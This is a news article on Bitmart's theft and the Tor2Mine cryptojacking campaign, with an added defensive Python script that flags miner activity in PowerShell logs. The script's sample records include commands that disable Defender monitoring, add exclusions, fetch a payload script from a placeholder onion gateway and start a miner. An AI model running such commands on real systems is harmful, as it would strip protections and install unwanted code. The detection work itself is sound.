The industry awoke today to news that the Bitmart exchange has been exploited for nearly $200 million in stolen funds via Ethereum and Binance Smart Chain. With exploits becoming more common and attackers finding ever more sophisticated ways to install malware, caution is advised.
What’s noteworthy, however, is that mining campaigns offer these hackers a low-risk way to make digital money by exploiting network vulnerabilities.
Earlier this week, Sophos security researchers warned of the return of Tor2Mine, a miner variant that uses a Tor gateway to communicate with its command-and-control servers. Once inside, it can take over entire networks of workstations and servers.
Stealing computing power
This type of cybercrime is known as cryptojacking: the attackers use other people's devices to mine cryptocurrency. By siphoning off the processing power and electricity of those devices while staying hidden, the miners obtain newly minted coins without paying for the hardware or the power.
Most of these miners, including Tor2Mine, mine Monero. The altcoin appeals to attackers because its transactions are private by design and hard to trace.
How Tor2Mine works: it uses PowerShell scripts to disable any existing malware protection on a server and then run the miner payload, which quietly consumes the system's resources. It also harvests Windows credentials, which Tor2Mine uses to spread to, and re-infect, other systems on the compromised network. Unless it is removed from every infected host, the remaining hosts keep re-infecting the ones that were cleaned.
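As an added example (not code from the page or from Sophos), the following Python scans PowerShell script-block log records for the behaviours described above: tampering with the endpoint's anti-malware settings, fetching payloads through a Tor2Web-style gateway, and launching a miner. The log records are constructed, and the three patterns are generic heuristics assumed for illustration, not published Tor2Mine indicators. Because the miner re-infects from any host left uncleaned, the scan groups findings by host so that responders see the whole set of machines to remediate at once.

```python
"""Scan PowerShell script-block log records for cryptominer tradecraft.

Added example, not Sophos's or the article's code. Records are constructed
and the detection patterns are generic heuristics assumed for illustration
(they are not published Tor2Mine indicators):
- Defender tampering via Set-MpPreference / Add-MpPreference
- Tor2Web-style gateway hostnames (<onion-name>.onion.<tld>)
- Stratum mining-pool URLs, as used by common miner binaries
"""
import re
from collections import defaultdict

# Each record mimics the fields a SIEM would extract from Windows Event ID 4104
# (PowerShell ScriptBlock logging). Constructed sample data, not real telemetry.
SAMPLE_RECORDS = [
    {"host": "WS-01", "script": "Get-ChildItem C:\\Users\\bob\\Documents"},
    {"host": "SRV-02", "script": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "SRV-02", "script": "Add-MpPreference -ExclusionPath 'C:\\Windows\\Temp'"},
    {"host": "SRV-02", "script": "Invoke-WebRequest -Uri http://abcdefghijklmnop.onion.ws/xx.ps1"},
    {"host": "WS-07", "script": "Start-Process svchost.exe -ArgumentList '-o stratum+tcp://pool.example:3333'"},
    {"host": "WS-03", "script": "Get-Process | Sort-Object CPU -Descending"},
]

# Heuristic rules (assumed for this example). Each maps a tag to a regex.
RULES = {
    # Disabling a Defender feature or adding exclusions from a script.
    "defender_tamper": re.compile(
        r"\b(Set|Add)-MpPreference\b.*-(Disable\w+\s+\$true|Exclusion(Path|Process|Extension))",
        re.IGNORECASE,
    ),
    # A Tor hidden-service name reached through a clearnet Tor2Web gateway.
    "tor_gateway": re.compile(r"\b[a-z2-7]{16,56}\.onion\.[a-z]{2,}\b", re.IGNORECASE),
    # Mining-pool connection string passed to a miner process.
    "stratum_pool": re.compile(r"stratum\+(tcp|ssl)://", re.IGNORECASE),
}


def classify(script):
    """Return the sorted list of rule tags that match one script block."""
    return sorted(name for name, rx in RULES.items() if rx.search(script))


def scan(records):
    """Group (tag, script) findings by host so lateral spread is visible."""
    hits = defaultdict(list)
    for rec in records:
        for tag in classify(rec["script"]):
            hits[rec["host"]].append((tag, rec["script"]))
    return dict(hits)


def hosts_to_remediate(records):
    """Every host with a finding; cleaning a subset invites re-infection."""
    return sorted(scan(records))


if __name__ == "__main__":
    for host, findings in scan(SAMPLE_RECORDS).items():
        print(host)
        for tag, script in findings:
            print(f"  [{tag}] {script}")
    print("Remediate together:", hosts_to_remediate(SAMPLE_RECORDS))
```

Running it lists SRV-02 (protection disabled, exclusion added, payload fetched via a gateway) and WS-07 (miner launched) as the set to clean together; in a real deployment the rules would be tuned against the environment's own baseline to avoid flagging legitimate administrative exclusions.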
Sophos also noted that while the number of Tor2Mine infections fell in early 2021, the decline was accompanied by the introduction of new variants. These likely stem from minor optimizations by different groups of operators, or by the same actors between campaigns.
The antivirus company also said that while two different versions of Tor2Mine have been detected since June, “their basic game plan is almost always the same”.
It concluded:
“Tor2Mine is much more difficult to eradicate once it’s established on a network without the support of endpoint protection software and other anti-malware measures… it cannot be fixed by simply patching and cleaning a system. The miner will constantly try to re-infect other systems in the network.”
In practice, the way to keep these miners out is endpoint protection that detects them, deployed across every machine on the network, since cleaning one host at a time leaves the rest to re-infect it.
As enthusiasm for cryptocurrencies has spread, illicit mining has become an established way of criminally acquiring digital assets. A recent cybersecurity report from Google found that 86% of compromised Google Cloud instances were used for illegal cryptocurrency mining, with some also used to scan for and attack other potential targets.
Interestingly, a June report from Kaspersky found that cryptojacking has fallen from its heyday in 2017-18 during the first crypto boom. However, the number of users who encountered miners on their devices rose from 187,746 in January to 200,045 in March of this year.